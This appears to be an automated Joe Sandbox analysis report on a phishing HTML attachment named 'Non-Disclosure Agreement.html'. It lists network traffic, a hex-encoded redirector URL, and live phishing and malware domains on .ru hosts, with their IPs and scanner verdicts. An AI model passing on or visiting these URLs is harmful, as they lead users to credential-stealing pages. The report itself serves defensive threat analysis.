Source: global trafficHTTP traffic detected: GET /jYpzYHmViExNWkcPprHooqPmcICSNRCVHESWFGPUOAJKQVZYGURNUKQYKRPKQYGKZJLMJYTGUELTF HTTP/1.1Host: 9lvhlxzdiaqw4etntpjio13ff6j43k6uo4auulcu4laov6ankj487fxe5hgt.uyofiykrxf.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: alternative-magic.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: e4x6.gurativez.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: 9lvhlxzdiaqw4etntpjio13ff6j43k6uo4auulcu4laov6ankj487fxe5hgt.uyofiykrxf.ru
Source: global trafficDNS traffic detected: DNS query: www.sharepoint.com
Source: global trafficDNS traffic detected: DNS query: assets.onestore.ms
Source: global trafficDNS traffic detected: DNS query: ajax.aspnetcdn.com
Source: global trafficDNS traffic detected: DNS query: c.s-microsoft.com
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1491058030:1734614036:lGnvY1elWyH7EhRRkOdPFDBDdTK2Q-wX130xIM0yJB4/8f47c7718f624386/7H8LG5SnqbO3T10Wvi8IaJOK4p16EBaa_PQ0ofUlBXE-1734615360-1.1.1.1-uFkKOZXfTSe_1mvdIu74Z9OPpAcKlUkRYImsDd1U2O350IQ4ldpJZv.sdf1vctVv HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3269sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: 7H8LG5SnqbO3T10Wvi8IaJOK4p16EBaa_PQ0ofUlBXE-1734615360-1.1.1.1-uFkKOZXfTSe_1mvdIu74Z9OPpAcKlUkRYImsDd1U2O350IQ4ldpJZv.sdf1vctVvsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qmivf/0x4AAAAAAAy6q7iduvs50k8-/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 13:36:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QidWJn8h1kTF%2F2UVtlv47sBy6Ef%2BbjVR0U%2Fj91lo5MXu7Gu%2FYksTJaoywvegvlclBGln6Y0Nz6gKWK1JEVMordrCsvyCAcCwxbyTtKvAazU6pCIvXayWGzDbSBzN1w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=48431&min_rtt=48360&rtt_var=13735&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2248&delivery_rate=59341&cwnd=251&unsent_bytes=0&cid=01707049fee34fde&ts=186&x=0"CF-Cache-Status: MISSServer: cloudflareCF-RAY: 8f47c792b9904387-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=5068&min_rtt=1990&rtt_var=2777&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1914&delivery_rate=1467336&cwnd=47&unsent_bytes=0&cid=c6d37e2ef8d68205&ts=968&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 13:36:06 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: OB5eP0ksm/NN/mPhfWAXxQnB7xrdcG5eyyU=$J7mVSuGORNaHDBReServer: cloudflareCF-RAY: 8f47c79acbbd43c1-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 13:36:13 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: hiykcxgWOWG/IONsYXrmg33Id4vR5Ff7cto=$6J0IWlju2us4wOdhServer: cloudflareCF-RAY: 8f47c7c3ea8c8c75-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 13:36:20 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: 1pnUHYbYL+r8Er8O9gNoBbrJsF57gICvnD4=$tFityM2ac05A4ZITcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f47c7f02ba24362-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_104.3.dr, chromecache_120.3.drString found in binary or memory: http://github.com/requirejs/almond/LICENSE
Source: chromecache_110.3.drString found in binary or memory: http://schema.org/Organization
Source: chromecache_110.3.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: chromecache_110.3.drString found in binary or memory: https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.c
Source: chromecache_110.3.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: chromecache_102.3.dr, chromecache_106.3.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
Source: chromecache_110.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: chromecache_110.3.drString found in binary or memory: https://onedrive.live.com/about/en-us/
Source: chromecache_110.3.drString found in binary or memory: https://outlook.live.com/owa/
Source: chromecache_110.3.drString found in binary or memory: https://products.office.com/en-us/home
Source: chromecache_110.3.drString found in binary or memory: https://products.office.com/en-us/microsoft-teams/free?icid=SSM_AS_Promo_Apps_MicrosoftTeams
Source: chromecache_110.3.drString found in binary or memory: https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
Source: chromecache_110.3.drString found in binary or memory: https://www.onenote.com/
Source: chromecache_110.3.drString found in binary or memory: https://www.skype.com/en/
Source: chromecache_110.3.drString found in binary or memory: https://www.xbox.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49808 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49858 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49919 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49986 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50064 version: TLS 1.2

System Summary

barindex
Source: Name includes: Non-Disclosure Agreement.htmlInitial sample: agreement
Source: classification engineClassification label: mal80.phis.evad.winHTML@31/51@44/13
Source: Non-Disclosure Agreement.htmlReversingLabs: Detection: 29%
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Non-Disclosure Agreement.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1932,i,11547400420386524786,6182731233480577917,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1932,i,11547400420386524786,6182731233480577917,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: https://e4x6.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/#W##[[-Email-]]##HTTP Parser: https://e4x6.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/#W##[[-Email-]]##
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting
Boot or Logon Initialization Scripts1
Deobfuscate/Decode Files or Information
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Non-Disclosure Agreement.html29%ReversingLabsDocument-HTML.Trojan.Redirector
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://e4x6.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/#W##[[-Email-]]##100%SlashNextCredential Stealing type: Phishing & Social usering
https://e4x6.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/100%Avira URL Cloudphishing
file:///C:/Users/user/Desktop/Non-Disclosure%20Agreement.html0%Avira URL Cloudsafe
https://alternative-magic.com/res444.php?2-687474703a2f2f653478362e67757261746976657a2e72752f6848375f434c66573842303675445a62466d41694c772f-plumwood0%Avira URL Cloudsafe
https://9lvhlxzdiaqw4etntpjio13ff6j43k6uo4auulcu4laov6ankj487fxe5hgt.uyofiykrxf.ru/jYpzYHmViExNWkcPprHooqPmcICSNRCVHESWFGPUOAJKQVZYGURNUKQYKRPKQYGKZJLMJYTGUELTF100%Avira URL Cloudmalware
https://e4x6.gurativez.ru/favicon.ico100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    alternative-magic.com
    69.49.245.172
    truefalse
      high
      code.jquery.com
      151.101.66.137
      truefalse
        high
        cdnjs.cloudflare.com
        104.17.25.14
        truefalse
          high
          e4x6.gurativez.ru
          172.67.155.68
          truetrue
            unknown
            challenges.cloudflare.com
            104.18.94.41
            truefalse
              high
              www.google.com
              142.250.181.132
              truefalse
                high
                9lvhlxzdiaqw4etntpjio13ff6j43k6uo4auulcu4laov6ankj487fxe5hgt.uyofiykrxf.ru
                104.21.18.132
                truefalse
                  unknown
                  c.s-microsoft.com
                  unknown
                  unknownfalse
                    high
                    www.sharepoint.com
                    unknown
                    unknownfalse
                      high
                      assets.onestore.ms
                      unknown
                      unknownfalse
                        high
                        ajax.aspnetcdn.com
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          file:///C:/Users/user/Desktop/Non-Disclosure%20Agreement.htmltrue
                          • Avira URL Cloud: safe
                          unknown
                          https://e4x6.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/true
                          • Avira URL Cloud: phishing
                          unknown
                          https://code.jquery.com/jquery-3.6.0.min.jsfalse
                            high
                            https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                              high
                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f47c7718f624386/1734615364486/nxr05CllTeOlRC3false
                                high
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8f47c7718f624386/1734615364488/88a3ca94e2ef2da89ec1cf6ab37a3d19f9970f5034a44c54454b9f03bd8a57b0/w1RgJuScIFU0600false
                                  high
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f47c7718f624386&lang=autofalse
                                    high
                                    https://alternative-magic.com/res444.php?2-687474703a2f2f653478362e67757261746976657a2e72752f6848375f434c66573842303675445a62466d41694c772f-plumwoodfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://9lvhlxzdiaqw4etntpjio13ff6j43k6uo4auulcu4laov6ankj487fxe5hgt.uyofiykrxf.ru/jYpzYHmViExNWkcPprHooqPmcICSNRCVHESWFGPUOAJKQVZYGURNUKQYKRPKQYGKZJLMJYTGUELTFfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                      high
                                      https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.jsfalse
                                        high
                                        https://e4x6.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/#W##[[-Email-]]##true
                                        • SlashNext: Credential Stealing type: Phishing & Social usering
                                        unknown
                                        https://e4x6.gurativez.ru/favicon.icofalse
                                        • Avira URL Cloud: phishing
                                        unknown
                                        https://a.nel.cloudflare.com/report/v4?s=QidWJn8h1kTF%2F2UVtlv47sBy6Ef%2BbjVR0U%2Fj91lo5MXu7Gu%2FYksTJaoywvegvlclBGln6Y0Nz6gKWK1JEVMordrCsvyCAcCwxbyTtKvAazU6pCIvXayWGzDbSBzN1w%3D%3Dfalse
                                          high
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1491058030:1734614036:lGnvY1elWyH7EhRRkOdPFDBDdTK2Q-wX130xIM0yJB4/8f47c7718f624386/7H8LG5SnqbO3T10Wvi8IaJOK4p16EBaa_PQ0ofUlBXE-1734615360-1.1.1.1-uFkKOZXfTSe_1mvdIu74Z9OPpAcKlUkRYImsDd1U2O350IQ4ldpJZv.sdf1vctVvfalse
                                            high
                                            https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.jsfalse
                                              high
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qmivf/0x4AAAAAAAy6q7iduvs50k8-/auto/fbE/normal/auto/false
                                                high
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://outlook.live.com/owa/chromecache_110.3.drfalse
                                                  high
                                                  https://www.skype.com/en/chromecache_110.3.drfalse
                                                    high
                                                    https://products.office.com/en-us/homechromecache_110.3.drfalse
                                                      high
                                                      https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.cchromecache_110.3.drfalse
                                                        high
                                                        https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jschromecache_110.3.drfalse
                                                          high
                                                          https://onedrive.live.com/about/en-us/chromecache_110.3.drfalse
                                                            high
                                                            https://products.office.com/en-us/microsoft-teams/free?icid=SSM_AS_Promo_Apps_MicrosoftTeamschromecache_110.3.drfalse
                                                              high
                                                              https://www.onenote.com/chromecache_110.3.drfalse
                                                                high
                                                                https://www.xbox.com/chromecache_110.3.drfalse
                                                                  high
                                                                  http://schema.org/Organizationchromecache_110.3.drfalse
                                                                    high
                                                                    http://github.com/requirejs/almond/LICENSEchromecache_104.3.dr, chromecache_120.3.drfalse
                                                                      high
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      172.67.155.68
                                                                      e4x6.gurativez.ruUnited States
                                                                      13335CLOUDFLARENETUStrue
                                                                      104.18.94.41
                                                                      challenges.cloudflare.comUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      142.250.181.132
                                                                      www.google.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      151.101.130.137
                                                                      unknownUnited States
                                                                      54113FASTLYUSfalse
                                                                      172.67.181.220
                                                                      unknownUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      151.101.66.137
                                                                      code.jquery.comUnited States
                                                                      54113FASTLYUSfalse
                                                                      35.190.80.1
                                                                      a.nel.cloudflare.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      104.17.24.14
                                                                      unknownUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      69.49.245.172
                                                                      alternative-magic.comUnited States
                                                                      46606UNIFIEDLAYER-AS-1USfalse
                                                                      239.255.255.250
                                                                      unknownReserved
                                                                      unknownunknownfalse
                                                                      104.21.18.132
                                                                      9lvhlxzdiaqw4etntpjio13ff6j43k6uo4auulcu4laov6ankj487fxe5hgt.uyofiykrxf.ruUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      104.17.25.14
                                                                      cdnjs.cloudflare.comUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      IP
                                                                      192.168.2.6
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1578290
                                                                      Start date and time:2024-12-19 14:34:51 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 5m 38s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:defaultwindowshtmlcookbook.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:7
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:Non-Disclosure Agreement.html
                                                                      Detection:MAL
                                                                      Classification:mal80.phis.evad.winHTML@31/51@44/13
                                                                      EGA Information:Failed
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 0
                                                                      • Number of non-executed functions: 0
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .html
                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
